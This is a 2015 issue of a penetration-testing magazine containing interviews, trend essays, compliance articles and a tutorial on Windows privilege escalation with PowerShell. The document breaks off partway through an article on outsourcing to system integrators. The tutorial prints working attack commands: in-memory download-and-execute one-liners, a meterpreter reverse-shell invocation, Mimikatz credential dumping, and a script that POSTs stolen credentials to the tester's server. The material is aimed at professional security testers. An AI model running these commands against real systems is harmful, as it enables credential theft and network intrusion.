ISSN 2084 - 1117 11/2015

PENETRATION TESTING AND

VULNERABILITY ANALYSIS

TRENDS IN 2016

INTERVIEW WITH KAI PFIESTER - FOUNDER OF

BLACK CIPHER SECURITY
PRIVILEGE ESCALATION WITH POWERSHELL
IMPACT OF COMPLIANCE ON INFORMATION
SECURITY
AND MORE...
source:i.stack.imgur.com
1
Managing Editor: Anna Kondzierska
anna.kondzierska@pentestmag.com

Betatesters & Proofreaders: Sushil Verma, Ayo Tayo Balogun,

Pierre-E Bouchard, John Webb, Jay Kay, Tom Updegrove, Ivan
Gutierrez Agramont, Matthew Sabin, Amit Chugh, Steven
Wierckx, Daniel Dieterle, Craig Thornton, Clancey McNeal, Paul
Oyola, David Kosorok, Andrea Consadori, Jarvis Simpson, Elia
Pinto, Daniela C

Special thanks to the Beta testers and Proofreaders who helped

with this issue. Without their assistance there would not be
a PenTest Magazine.

Senior Consultant/Publisher: Pawel Marciniak

CEO: Joanna Kretowicz

joanna.kretowicz@pentestmag.com

DTP: Anna Kondzierska

Publisher: Hakin9 Media Sp.z o.o. SK

02-676 Warsaw, Poland
ul. Postepu 17D
Phone: 1 917 338 3631
www.pentestmag.com

Whilst every eort has been made to ensure the high quality of
the magazine, the editors make no warranty, express or implied,
concering the results of content usage. All trade marks presented
in the magazine were used only for informative purposes.

All rights to trade marks presented in the magazine are reserved

by the companies which own them.

DISCLAIMER!
The techniques described in our articles may only be used in
private, local networks. The editors hold no responsibility for
misuse of the presented techniques or consequent data loss.

2
Contents
I think it is a great space to be in right now and for the future
5
interview with Kai Pfiester founder of Black Cipher Security

Future of Pentesting and its trends for 2016 and beyond

by Jaro Nemcok & Ondrej Krehel
10

Privilege escalation with PowerShell

by Jonathan H. Broche 13

Security vs. compliance and the role of the penetration tester

20
by Joshua Gold

What issues might occur in outsourcing to an SI

by Jim Hart 24

Pentesting a true art form

by Martin Brough 27

Think of security as a wheel and a never ending circle

29
interview with Martin Voelk CEO of Cyber 51

The sword and the shield

by Tom Updegrove 32

Impact of compliance on information security

by Ayo Tayo Balogun
36

3
Dear PenTest Readers,
We would like to proudly present you the newest issue of PenTest Open, which is free to
download for everyone interested in the topic. We hope that you will find many interesting
articles inside the magazine and that you will have time to read all of them.

We are really counting on your feedback here!

We are approaching the end of the year, so it is time to think about future and the year
2016. In this issue we discuss the newest tools and trends that probably will play a big role
in the coming months. You can read about privilege escalation with PowerShell and about
Cobalt Strike. Have you ever thought what issues may occur in outsourcing to an SI - you
can read what Jim Hart has to say about it in one of the articles.

There are also two interviews with CEOs of penetration testing companies. Our first
interview is with Kai Pfiester, the founder of Black Cipher Security. We discussed the
challenges of managing your own company and the state of the industry as it is today and
in the days to come. The second interview Martin Voelk, the CEO of Cyber 51. We talked
about his endeavours in making security better and more available. You cant miss it!

The main aim of this issue is to present our publication to a wider range of readers. We
want to share the material we worked on and we hope we can meet your expectations.
With free account you have access to all the teasers and open issues, but we fully believe
that youd like to take this one step further and enjoy our publications without limits. Our
premium subscription contains access to our whole archive.

The virtual doors to our library are open for you!

Weve already started preparing the next issue of PenTest, which is going to be about
Cloud Pentesting. If there is a tool you would like to write about or you are a company
which wants a professional product review - contact us!

We would also want to thank you for all your support. We appreciate it a lot. If you like this
publication you can share it and tell your friends about it! every comment means a lot to
us.

Again special thanks to the Beta testers and Proofreaders who helped with this issue.
Without your assistance there would not be a PenTest Magazine.

Enjoy your reading,

PenTest Magazines
Editorial Team

4
I think it is a great space
to be in right now and for
the future
interview with Kai Pfiester founder of Black Cipher Security

KAI PFIESTER
Founder of Black Cipher Security. He holds numerous IT
security certifications such as Certified Ethical Hacker, OSWP
and Security+. As an author he has written articles on cyber
security for the NJ Law Journal, NJ Business magazine,
Burlington Regional Chamber of Commerce and several online
publications. As a speaker, he has done presentations for the
Phi Alpha Delta Law Fraternity International, NJ Society
of CPAs, and several local business organizations.

To contact Kai:
Phone: 609.284.6513
Email: k.pfiester@blackcipher.com
Web: www.blackcipher.com

[PenTest Magazine]: Can you tell us something about yourself?

[Kai Pfiester]: I have been into IT since I first got introduced to the Apple IIe in middle school. Several years
later, when I was about 10 years old, I saw the movie War Games and instantly knew I wanted
to get into cyber security at some point. Then, in the mid-90s, I saw the movie Sneakers and Hackers which
really motivated me to get into the information security field. I started reading everything I could find from old
issues of Phrack to 2600 to online forums and technical manuals. But back then there wasnt as much
information online as there is today.

[PT]: And now, when you are working in the field, did reality meet the expectations?

[KP]: Reality has definitely met my expectations. I love my job and feel I have found what I was born
to do. I am a chess player and I love a good challenge that forces me to think outside the box. Penetration
testing and cyber security are, in my humble opinion, some of the most challenging fields to work in, since
they are so dynamic. It is a game of constantly moving targets.

5
[PT]: What convinced you to establish your own company?

[KP]: I decided to start my own IT security company around the time of the Target and Home Depot
breaches. During that time period, it seemed like there was a new breach every other week or so. I came to
the conclusion that cyber-attacks are only going to continue and only going to get worse. I enjoy helping
people and love cyber security so it was a natural fit for me.

[PT]: What kind of challenges did you face while creating your company?

[KP]: There were, and still are, many challenges in starting my own company. For starters, I thought
I wouldnt have to really sell anything. With all the hacking and data breaches at the time, I sincerely believed
that other businesses would come running to me for help. However, that was not the case
as most business owners that I encountered didnt think they were even worth a hackers attention.
So the primary challenge for me to this day is getting business owners to realize the need for
an effective information security plan. The next big challenge for me was to deal with all the other aspects of
running your own business such as contracts, website design, marketing, business development,
partnerships, taxes, etc., that come with being an entrepreneur. I am a technical person and so I had to
learn all of the other stuff as I went along.

[PT]: Your company provides services for small and medium companies. Do you find more firms are
becoming aware of cyber-attacks?

[KP]: Due to the media coverage, yes, more firms are becoming aware of the proliferation of cyber-attacks.
However, they tend to still think that it wont happen to them or that they havent been hacked yet.
However, most are not keeping and monitoring logs so unless there is some blatant evidence of
a breach, they have no way of knowing if theyve been compromised or not.

[PT]: What do you think are challenges for firms who are between small companies and major
corporations?

[KP]: In my opinion the major challenges they face are deciding whether they need to outsource their IT
security in order to keep costs down versus having their own in-house information security team. As we all
know, if you have data and / or resources worth the attackers attention, you will be targeted at some point.

[PT]: From your own experience, do you prefer to work with smaller or bigger companies?

[KP]: I prefer to work with smaller companies as there is less bureaucracy and you can get to the heart of
the matter (securing their infrastructure) quickly.

[PT]: What are your general thoughts about development of cyber security market?

[KP]: I think it is a great space to be in right now and for the future. When you consider how IT
is interwoven into almost every aspect of a persons daily life, it is easy to see how crucial IT security
is and will be. From IoT to mobile apps to social media to corporate and government networks, the cyber
security market is going to thrive well into the future.

6
[PT]: As a person who knows penetration testing tools a lot, do you think there are going to be any
breakthrough changes in technology?

[KP]: Absolutely! I think it is only a matter of time before quantum computers will be able to crack RSA
encryption pretty quickly. Multi-factor authentication based on physical and / or behavioral traits seems to
be the best approach to truly securing things. For instance, the banking industry is seriously considering
using a persons heartbeat to authenticate before granting access to certain financial services.

[PT]: There seems to be a very strong push to get rid of passwords and replace them with more reliable
solutions. What do you think about that? Is that a move in the right direction?

[KP]: I completely agree that we need to get rid of passwords once and for all as a form of single-factor
authentication. They can stick around if we use them only in multi-factor authentication scenarios. VCRs
and video tapes were great when they first came out. They served their purpose well. But then came DVDs
and now we are streaming video directly to our screens. Passwords are in the same boat. With super-
powerful GPU-based password cracking machines, freely available wordlists, rainbow tables, etc, many
common passwords can be cracked within a week to ten days. If passwords are accompanied by some
form of two-factor authentication the account they are protecting is pretty safe. But I imagine it
is only a matter of time before that obstacle is overcome.

[PT]: Can you tell us what is changing in terms of recruiting pen testers or cyber security specialists?
Do you find it's going to be harder to find a job in this area?

[KP]: I recently discovered a website called stealthworker.com that specializes in recruiting and staffing for
cyber security. I imagine that there will be other sites like it and eventually there will be a clearing house, so
to speak, where you can find the talent that you are looking for. As for finding a job in this area, no, I dont
think it is going to be harder. You cannot go wrong by specializing in IT. You can almost always find a job. As
for the cyber security market, if you have the skills, there will always be work. Especially in the government
sector.

[PT]: Every day we can hear about new attacks. How do you see cyber threats evolving in the near
future?

[KP]: As cyber security product vendors make products better at detecting the subtlest attacks, attackers
will be forced to evolve their attacks as well as their skillset. The human factor is always going to play a part
since humans are the ones that can make the greatest security technology in the world completely useless
by not configuring it correctly or by being social-engineered to turn it off. Leveraging Powershell in Windows
is also a growing attack vector as it does not trip AV. So I imagine using a systems tools against itself will
also play a part in the types of attacks we see a lot of in the future.

[PT]: Following previous question, do you find tools we have are good enough to ensure complete
protection of a company?

[KP]: The primary weaknesses in cyber security are threefold: humans, technology and processes. There is
great security awareness training available for people so that is covered. There is also highly-effective data

7
security technologies as well as policies that govern how IT equipment and data should
be handled. So what, then, is the problem? The problem is that rarely are all three of these factors
implemented together into a solid cyber security defense strategy. When they are, a data breach is
an extremely rare occurrence, if it ever is.

[PT]: Have you got any final thoughts about trends in penetration testing and vulnerability analysis in
2016?

[KP]: As more and more people get into the field we are going to see some really cool tools
be developed. I also think we are going to see more frameworks like SET and Metasploit be released.
When parents have only one child, that child has no one to learn from. Most of his or her knowledge comes
from single-handed experience. But the next child born into the family not only learns from their own
experience, but learns from the other child as well. So the second childs skillset develops faster than the
first childs skillset. We have the same situation with pen testing and vulnerability analysis
as well. These fields are young and the elders have set the stage with all their hard work and contributions.
But I think the younger generation is going to improve and build upon the current foundation and develop
tools that will be super effective in bypassing todays defense technologies.

[PT]: Do you have any thoughts or experiences you would like to share with our audience? Any good
advice?

[KP]: Never be so arrogant that you think you are unhackable or not worth an attackers time
or attention. I once had a business lead at a certain company and after talking to the companys IT guy, he
basically told me that he had all the companys cyber security under control. At that point, I said OK and let
it be. Six weeks later I get a call from him. He was in panic mode because his network had been hacked.
They noticed more bandwidth than normal was being eaten up and tracked it to a specific server. Upon
further investigation it had been hacked and was turned into a spam server. After checking the timestamps
on certain files, it was determined that his network was hacked prior to, and during, the time he told me that
he had all the networks security under control and didnt need my help. True security requires humility and
constant vigilance.

8
source:hospitalitynet.org

Future of pentesting and its

trends for 2016 and beyond
by Jaro Nemcok & Ondrej Krehel

One of the predictions in 2016 is that it will be a year of Hacking the Code. Not
DaVinci Code, computer code. This code contains vulnerabilities and its being
exploited with underlying integrations and connections to various enterprise-
class systems.
The second prediction is that we will be seeing cybersecurity and incident
response automation. This relates to the notorious erroneous nature of human
beings, despite genuine talent, that creates this automation and digital world we
know today.

Penetration testing is, by many, already considered to be a commodity tactic today.

To achieve the best results, a pentester needs to combine various strategies, from leveraging the power
of top-notch automated tools, a combination of manual and automated testing, writing their own tools
for new technologies, a solid knowledge of the systems attacked, as well as scripting, social
engineering, to dark web spider-intelligence, and more. Many popular penetration testing tools help
penetration testers with creating fancy-looking reports that leave a great impression (and resonate well)
with the client. Tools then combine online dark web data, perimeters, systems, and application layers
in one beautiful report with its own scoring schema. Oftentimes, the driving force
of penetration testing is a need to be in compliance with regulations instead of a genuine decision to
actually improve security.

The benefits of using automated tools are great and it is always a good idea to be equipped with the
best tools available that can help automate the work as much as possible. You could almost think of
it as a scripted set of testing attacks with payload parameters. This is where we see the industry going.
They do not have to be commercial. A great momentum exists in the open source community, including
OWASP. Of course, with even more automation, there will still be a major dierence in the quality of
work between top penetration testers and an automated scan -a vulnerability scan does not equal
a pentest. The shift towards automation, however, can be a cost-ecient alternative for companies
looking to save on basic penetration testing services and a good way for any penetration testers
looking to save time and be more ecient.

9
One peculiar nightmare of automated tools is the ratio of false positives followed by ranking and
an interpretation of findings. Humans are still needed to properly categorize and eliminate false
positives. Tools provide learning capabilities are far away from the popular terms of machine learning
and intelligence, however.

As new tools and utilities are being

introduced to help automate
penetration testing tasks to such
a degree that would not have been
possible just a few years ago,
application complexity, technologies,
and trends evolve exponentially with
them.
Although automation continues to be essential for pentesters, the challenges remain the same: every
application is dierent, tools will heavily depend on user direction, since they cannot understand the
context and semantic meaning, have no intuition, and cannot improvise nor adjust strategy.

Pentesting strategies are now converted from one shot a year exercise to annual programs, where
secure code review, static and dynamic, is combined with perhaps quarterly penetration test
of targeted areas. The financial sector, in particular, considers penetration testing as an annual product,
versus a one-time service. Professional firms use human intellect and tools to setup whole
cybersecurity code exploitations and development practices with emphasis on testing components.

Eective penetration testing teams will consist of 3-5 highly trained professionals and specialists,
executing the pentest assignment with well-rehearsed scrum ecacy, communication, division of tasks,
re-prioritizing backlog, tracking, addressing new issues, strategically re-focusing to maximize value
of both individual and the team contribution, committing and owning the project from start to
completion. Teams adapting lean methodologieswould typically achieve a velocity of at least double
of isolated individual contributors of same background

New skillsets will be required in various emerging areas of penetration testing:

10
Mobile Devices -iOS, Android, or Windows based native applications, as well as a hybrid
application assessment will become more and more important as the use of mobile devices will be
gradually shifting from entertainment to business use and processing financial and other sensitive data.

Cloud and virtualization -software-defined network technology is new and changing

rapidly - also changing is its threat landscape. This will require adjusting pentesting techniques with a
matching speed.

Internet of things, embedded systems, pentesting/reverse

engineering -oce and home automation, vehicles, medical, payment, industrial control
systems, switches, power converters, circuit breakers, and other devices are being connected to
networks and therefore exposed to possible attacks - they all will need new and improved tools and
approaches.

Ever evolving modern JavaScript based web applications -to

assess security of such applications there will be a need to combine the classic crawling and scanning
with a web browser engine, JavaScript debugger, forward/backward tracer, unpacking/de-obfuscation
snapshots comparer, a script based state/variable alerting, injecting and fuzzing.

Wireless systems -Software-defined radio (SDR) based wireless security assessments, WiFi,
smart meters, wearable devices, etc. - all this will require specific tools and skillsets.

Machine learning -based anomalies detection will keep improving.Unfortunately, so do

counter-measures.

Internal network pentesting -will be used more as companies realize that to penetrate
their internal networks using social engineering is a real possibility.

Social engineering -as a part of pentesting, in the foreseeable future, we don't see
a possibility that an automated robot can get to a company building and ask somebody to "print his
resume" from an USB drive.

Remanence of Zeitgeist-old era are **legacy systems** with a plethora of well-humming and rather
dated production deployment out there are great examples of pentester need. These systems will
continue to require pentesting, which will not deviate greatly from currently-proven methodologies, and
a skilled pentester is crucial for those precise military snipermissions.

We do believe that in the near future and beyond (at least until the time when applications are fully
developed and auto-improved by autonomous artificially intelligent agents), it will still be the human
genius and intelligence, in-depth understanding, and ecient utilization of automated tools, which will
determine the most successful pentesting outcomes. Terminator is an interesting concept and a movie,

11
only time will show how far an artificial intelligence will get and if the human genius will replace itself by
fully automated systems. Do not forget, in the present days, it is the human hacking skillset that so far
won the race against machines.

About the authors:

JARO NEMCOK
Web Security Researcher at LIFARS LLC, an international cyber security and
digital forensics firm. He started his career in software development with
focus on security and later moved to Information Security, focusing
on system audits, security/risk assessments, penetration testing, incident
response to hacked web applications, and overall security.
He has almost two decades of cybersecurity experience, including
vulnerability assessment, secure code review, cloud-based penetration
testing, digital risk assessment, digital evidence acquisition, investigation
of web attacks, security assessments of Internet-facing applications,
penetration tests across internal networks, development of testing scripts
and procedures, and digital forensics. Jaro worked on many high-profile
cases, including a much publicized Box.com and Dropbox leakage.

ONDREJ KREHEL
CEO and Founder of LIFARS LLC, an international cybersecurity and digital
forensics firm. With over two decades of experience in computer security and
forensics, he conducted a wide range of investigations, including data
breached through computer intrusions, theft of intellectual property, massive
deletions, defragmentation, file carvings, anti-money laundering, financial
fraud, mathematical modeling and computer hacking.
Ondrejs experience also includes advanced network penetration testing,
database security testing, physical security assessments, logical security
audits, wireless network penetration testing, and providing recommendations
for operational eciency of approaches. He is one of the few security experts
in the world holding the Certified Ethical Hacker Instructor Certification (CEI).
Ondrej worked on many high-profile cases, including a much publicized

12
Privilege escalation with
powershell
by Jonathan H. Broche

Privilege escalation is a task that proves difficult at times. In the past, one would
rely heavily on metasploit as the full exploitation suite. With metasploit, one
would not only be able to exploit a vulnerability but quickly elevate privileges
with the get system command. However, with the landscape of cybersecurity
constantly changing, it was only a matter of time before network administrators
implemented new technological advancements that would detect and prevent
most metasploit payloads. With one of pentesters favorite tools now being
detected, pentesters needed to find an alternative solution.

13
Welcome to the new era of pentesting, an era where dropping binaries onto victim systems is no longer
required. An era where one can execute shellcode or obtain credentials in the clear without touching
the file system. Welcome to the era of pentesting with PowerShell.

This article aims to provide a technical introduction on how to use PowerShell to quickly escalate
privileges on Windows operating systems.

THE WORLD OF POWER SHELL

Since its release in November of 2006 (https://en.wikipedia.org/wiki/Windows_PowerShell), PowerShell has facilitated the
jobs of several Windows administrators. With an array of methods and functionalities, PowerShell is
much more powerful and diverse than its predecessor, the command prompt. However, despite
PowerShells diverse functionality, there is one method that catches the eyes of pentesters, the
DownloadString method.

The DownloadString method is present in PowerShell version 2.0 and forward. When used,
DownloadStringdownloads the contents of a webpage into a string. If the string downloaded happens
to be a PowerShellscript then this can be executed. The best part? The execution would run
in memory, thus bypassing most security products and PowerShells script execution policy.

To demonstrate the DownloadString functionality, I created a simple PowerShell script named

ipconfig.ps1 and ran it on a fully patched Windows 10 operating system. The ipconfig.ps1 script
identifies the version of PowerShell running and runs ipconfig.

Table 1: Ipconfig.ps1 script contents

$ver = $PSVersionTable.PSVersion.Major
"You are using PowerShell version " + $ver
ipconfig

There is an error when the script is run locally since PowerShells execution policy is set to restricted.
This means that no PowerShell scripts can be run.

Figure 1: PowerShell execution error

However, if the script is uploaded to a webserver and DownloadString is used, PowerShells execution
policy is bypassed.

Table 2: Example of PowerShellsDownloadString functionality

PS >IEX (New-Object Net.WebClient).DownloadString(http://gojhonny.com/pentestmag/ipconfig.ps1)

14
Figure 2: PowerShell DownloadString downloading and executing the ipconfig.ps1 script

Armed with this knowledge, pentesters started creating PowerShell scripts and combining them with
the DownloadString method to bypass security restrictions. Today, two of the most widely used scripts
are the Invoke-Shellcode and Invoke-MImikatz scripts. Both scripts may be found on
MattGraebersGithub(https://github.com/mattifestation).

INVOKING SHELLCODE IN MEMORY

The Invoke-Shellcode script allows pentesters to execute custom shellcode or payloads like
metasploits reverse HTTP. The example below depicts the use of the DownloadString method to
bypass security restrictions and execute a reverse metasploit HTTP payload in memory. The Invoke-
Shellcode script was placed on a local webserver with the IP of 192.168.146.132.

Table 3: Example of PowerShell DownloadString Invoke-Shellcode command

PS >IEX (New-Object Net.WebClient).DownloadString("http://<pentester_web_server>/Invoke-

Shellcode.ps1")
PS >Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost<ip> -Lport<port>

Figure 3: PowerShell DownloadString downloading and executing the Invoke-Shellcode script

After executing the script on the victim system, one should have obtained a shell as shown in Figure 3.

Figure 4: Reverse HTTP shell obtained by using the Invoke-Shellcode script

15
OBTAINING CACHED CREDENTIALS IN MEMORY
The Invoke-Mimikatz script is a port from Benjamin DelpysMimikatz created by Joseph Bialek.
Mimikatz assists pentesters by obtaining and outputting cached credentials in clear text. Again, the
example below shows sample usage of the Invoke-Mimikatz script using the DownloadScript method.

Table 4: Example of PowerShell DownloadString Invoke-Mimikatz command

PS >IEX (New-Object Net.WebClient).DownloadString("http://<pentester_web_server>/Invoke-

Mimikatz.ps1")
PS > Invoke-Mimikatz DumpCreds

Figure 5: Execution of Mimikatz in memory with PowerShell DownloadString

The ability to execute this script in memory is incredibly powerful for pentesters. Imagine recursively
obtaining the credentials of all systems in a domain. One would be able to obtain domain administrator
credentials in seconds and successfully escalate privileges. This is where CredCrack comes in.

A U T O M AT I N G P R I V I L E G E E S C A L AT I O N W I T H
CREDCRACK
Pentesters love automation, in fact we love automating as many things as possible. Thankfully, there
are tools that have been created to automate exploitation and privilege escalation and make the lives
of pentesters easier. With great tools, such as Empire, PowerUp and CredCrack, one may go from
domain user to domain administrator in seconds. The following section will demonstrate how to use
CredCrack, a popular credential harvesting script.

CredCrack was created and released by myself, Jonathan Broche, in August of 2015(http://blog.gojohnny.com/
201508/domain-administrator-in-17-seconds.html). Since then, it has become a popular tool amongst pentesters and

with the online community. CredCrack has two main functionalities: share enumeration and credential
harvesting.

Table 5: CredCrack's help menu

16
usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
[-l LHOST] [-t THREADS]

CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)

optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILEFile containing IPs to harvest creds from. One IP per
line.
-r RHOST, --rhost RHOST
Remote host IP to harvest creds from.
-es, --enumshares Examine share access on the remote IP(s)
-l LHOST, --lhost LHOST
Local host IP to launch scans from.
-t THREADS, --threads THREADS
Number of threads (default: 10)

Required:
-d DOMAIN, --domain DOMAIN
Domain or Workstation
-u USER, --user USER Domain username

Examples:

./credcrack.py -d acme -u bob -f hosts -es

./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20

Once domain user credentials have been compromised, it is recommended to use CredCracks share
enumeration functionality to identify systems the compromised user has administrative access to.

The share enumeration functionality uses the SMB protocol to test shares for write access on the
systems provided.Systems that grant read/write access to its administrative share (C$) indicate that
the user has local administrative access.

Figure 6: Enumerating share access with CredCrack

After using the share enumeration functionality, the pentesterwould create a list of systems with
administrative access and feed them into CredCracks credential harvesting functionality.

17
CredCracks credential harvesting works by executing the Invoke-Mimikatz script using
PowerShellsDownloadString method against the provided systems. Victims will execute Invoke-
Mimikatz and send the credentials over an HTTP POST request back to the pentesters system.

Figure 7: Illustration of CredCrack sending Invoke-Mimikatz to victim systems

Below is the initial PowerShell script victims will be executing:

Table 6: PowerShell script CredCrack will execute on victims

IEX (New-Object Net.WebClient).DownloadString('http://<pentester_web_server>/Invoke-

Mimikatz.ps1');
$creds = Invoke-Mimikatz -DumpCreds;
$request = [System.Net.WebRequest]::Create('http:://<pentester_web_server>/creds.php');
$request.Method = "POST";
$request.ContentType = "application/x-www-form-urlencoded";
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();

Once Mimikatz has been executed on the victim system through PowerShell, it will send the credentials
in a POST request to the pentester's system.

Figure 8: Illustration of CredCrack sending credentials in a POST request back to the pentester

After all victims have finished the execution of Mimikatz, CredCrackwill search for any matches against
the domain administrator's list to see if a domain administrator account was obtained and if so, output
the accounts credentials.

18
Figure 9: CredCrack output

Domain administrator in just 10.9 seconds! CredCrack has proven to be one of the fastest ways to
escalate privileges in large enterprise environments and is just one example of the several powerful
tools available for pentesters today.

CONCLUSION
There are several ways to escalate privileges on a network and the aforementioned tools are just
a handful of them. The cyber security landscape is always changing and there is always something to
be learned. Try the methodologies mentioned in upcoming pentests and do not be discouraged from
researching new methodologies and building the next best tool!

About the author:

JONATHAN H. BROCHE
computer security professional with over ten years of hands-on experience in the
Information Technology field. He specializes in penetration testing, social
engineering and system security configurations. Jonathan has a bachelor's degree
in Information Technology from Florida International University with concentrations
in application development and UNIX administration. Additionally, he has earned
certifications from Oensive Security (OSCE, OSCP, OSWP) and the Global
Information Assurance Council (GSEC).
Jonathan is also a researcher, writer and speaker. His latest contribution to the
industry is the renowned CredCrack tool which gained international attention upon
its release. Jonathan is an active member of several security-related organizations
such as local ISSA and OWASP chapters and frequently participates in capture
the flag events. In his free time he enjoys mountain biking.

19
 Security vs. compliance
and the role of the penetration tester
by Joshua Gold

In regulated industries, it has become common practice for management to

assume that compliance and security are one and the same. They believe that
because an auditor has marked them as being compliant, there are no further
actions that need to be taken to secure their systems. The idea that because
something is compliant, it must also be secure has become an inside joke
among security professionals; unfortunately, those same professionals are often
incapable of translating to management exactly why a compliant system is not
necessarily secure.

INTRODUCTION
In January of 2011, the United States Government Accountability Office (GAO) reported to Congress that
Utilities are focusing on regulatory compliance instead of comprehensive security and that security
requirements are inherently incomplete, and having a culture that views the security problem as being
solved once those requirements are met will leave an organization vulnerable to cyber-attack.It is not
only utilities that suffer from this problem; in the last 18 months, over 150 million credit cards numbers
and protected health records have been stolen from companies that had all been found compliant
in their most recent assessments. Companies like Target, JP Morgan, Home Depot, and Neiman Marcus
(to name only a few) have learned just how short of true security a compliant program can leave you.

In regulated industries, it has become common practice for management to assume that compliance and
security are one and the same. They believe that because an auditor has marked them as being
compliant, there are no further actions that need to be taken to secure their systems. The idea that
because something is compliant, it must also be secure has become an inside joke among security
professionals;unfortunately, those same professionals are often incapable of translating to management
exactly why a compliant system is not necessarily secure.

20
THE ROLE OF THE PENETRATION
TESTER
Most experienced penetration testers know the feeling of arriving
on site to a new client and having the security administrators
almost beg to have their systems compromised. They are aware
of how vulnerable they are, but have been unable to secure the
budget to do anything about it. They believe that the only way
to do so is for the penetration test report to show management
exactly how secure their compliant system is. Oftentimes
throughout the drafting of the report, the security administrators
will request specific wording or recommendations that they
believe will help them convince their management team that
something more needs to be done.

However, it is also
important for the
penetration tester to
be aware of and
knowledgeable about
the regulations with
which their client must
comply
It is no secret that many companies value third party input much
more highly than they do internal recommendations. A request
that has been made multiple times from a security team may
sudden be fulfilled if it comes as a recommendation in a third
party report. As such, it is often the responsibility of the
penetration tester to identify the areas where management has
been lax in assigning resources and prioritize their
recommendations accordingly. If it is clear that large amounts of

21
the security budget is being directed towards a brand new Security Incident and Event Manager (SIEM),
but the security staff doesnt have the knowledge or training to support that SIEM, it is important for the
penetration tester to recognize this and recommend training for the security staff.

Writing a report that recommends changes that fall far outside the scope of the clients compliance
needs is as likely to create meaningful change as not writing the report at all. On the other hand, if the
report can be aligned with the clients compliance goals, it becomes far more likely that management
and the security team will utilize it to achieve not only greater security, but also stronger compliance.

IF COMPLIANCE SECURITY, WHY BOTHER?

Many people question the necessity of regulations, as they do not necessarily engender true security.
The thinking is that if companies are left to their own devices, they will develop a security posture
commensurate with their risk. To a certain extent, this line of thinking has its merits. However, one can
easily compare the security posture of the U.S. Electric Utilities (regulated by the NERC CIP Standards)
to those of the U.S. Water Utilities (unregulated). Both utilities are considered Critical Infrastructure, and
both face the same sort of cyber threats.

The NERC CIP standards have forced the electric industry to implement a minimum standard of security.
Many utilities have taken the approach of doing things right as long as they have to do them for
compliance. These utilities are using their compliance burden to drive budget into their security
departments, and to secure upper management buy-in. The water industry, on the other hand, is often
described as The Wild West by security experts. The lack of any regulation has led to a huge spectrum
of security postures. Some utilities are taking the threats they face seriously, and have state of the art
defenses in place. Other utilities still have SCADA systems directly connectable via dial-up without any
authentication in place. This is not from a lack of effort on the part of the security teams at these utilities-
it is often a lack of motivation, and sometimes understanding, on the part of upper management.

It is clear that compliance does have

an impact on the overall level of
security that can be expected in an
industry.
Compliance has given the electric utilities the motivation and justification to fight for greater budgets.
Security and compliance teams can take hard numbers to upper management to show that
an expenditure of $100,000 can prevent a fine of $1,000,000. Security teams in the water industry that
want to spend the same amount are often left with no compelling way to justify the expenditure in terms
that management is likely to understand.

22
WHAT CAN BE DONE TO INCREASE SECURITY AND
COMPLIANCE?
It is clear that compliance does have an impact on the overall level of security that can be expected in an
industry. However, it is also clear that as the compliance burden grows, companies begin to shift their
focus towards meeting compliance, rather than becoming truly secure. As an independent third party, it
is important for the penetration tester to maintain an objective view of the overall security posture and
the machinations that have brought it about. In the end, it is the goal of every penetration test to help the
client become more secure. Often this is accomplished by demonstrating weaknesses in target systems
and advising on mitigating the risk to those systems. In a regulated industry, those mitigation plans may
need to align with the overall compliance goal while still reducing the overall vulnerability of the system.
Through this alignment, the penetration tester provides the means for security teams to fight for and
receive the funding and support that makes true security possible.

Perhaps the best way for penetration testers to accomplish this is to become an expert on the
compliance burden faced by their clients. Penetration tests for the electric industry should be conducted
by NERC CIP experts, penetration testers for the the health industry should be HIPAA experts, and
penetration testers for the retail industry should be PCI-DSS experts. A good NERC CIP pentester could
certainly find plenty of vulnerabilities in a hospitals systems, but their report would not be nearly
as complete or compelling as one written by a HIPAA expert--to say nothing of a penetration tester who
has no compliance knowledge at all. The ability to custom tailor report findings towards specific
compliance burdens will allow penetration testers to better serve their clients and help increase the
overall level of security from compliance-driven entities.

About the author:

JOSHUA GOLD
Security Consultant with Network & Security Technologies, which provides
consulting services primarily to the U.S. Electric Industry. Mr. Gold was
awarded a B.S. degree in Cybersecurity from the University of Maryland
system and maintains a number of industry certifications. He also volunteers
his time with the National Emergency Management Teams (Region 2,
Communications Division) where he actively assisted in the recovery
of businesses in New York City after Hurricane Sandy in 2012.

23
What issues might occur
in outsourcing to an SI
by Jim Hart

source:http://cdn.cfo.com

Many large organizations use a system integrator (SI) to provide their IT

infrastructure and associated services. There is also a growing trend to use
multiple suppliers to deliver the holistic service that was once provided by a
single SI. In either case, using SI(s) can significantly impact the efficacy of
Penetration Testing unless the issues are recognized and managed early on by
the organization being tested.

Penetration testing is typically performed for a set number of reasons, often at pre-determined intervals
and for pre-determined in-scope systems. Other testing may occur ad-hoc as required after significant
changes to the environment.

Pre-determined testing is again sub-divided into evaluating security weaknesses with the intention
of maintaining a good level of protection, or as part of a regulatory requirement for annual testing such
as PCI. How effective the penetration testing is may be highly dependent on the type of engagement the
organization has with the SI and not necessarily the SI itself.

A good example here is based on our experiences of IBM, Fujitsu, CGI and others. The SIs themselves
all have the skills and capability to offer a highly effective all-round service delivering on the promises set
out when a contract is negotiated. However, depending on the contract negotiated, the organization will
receive different levels of service highly correlated to the value of the overall contract with the
SI (basically - you get what you pay for). So, while at a high level and on paper, services provided in the
bundle by the SI, like Penetration Testing, may look comprehensive and tick all the right boxes but
do they really deliver what the organization needs?

In our example above, the SI may deliver the regular penetration tests on time and per the pre-defined
scope, generally satisfying the term of the contract but not necessarily satisfying the need to effectively
secure the organization and to assure full compliance against any regulatory requirements. Gaps only

24
become apparent once the organization actually looks more deeply at the nature of the testing, how
it was initiated and performed.

It is important to regularly ask questions of the SI such as how deep was the testing and how was the
scope validated? When you look at the small print of what was actually agreed, you may find the level
of testing agreed to was actually only superficial and mostly automated scanning hardly real
penetration testing at all. This may be far below the actual capability of the SI, and maybe they did not
engage their top-tier testers or allow as much time as required to do a truly effective job at identifying the
more subtle issues. Unless the organization employs specialists who examine or validate the level
of testing, there may be an assumption that everything is fine as penetration testing is completed
regularly.

Scope is another important factor. The SI will typically be very good at keeping a complete and up
to date list of all the assets being managed, as that is effectively their only way of accurately calculating
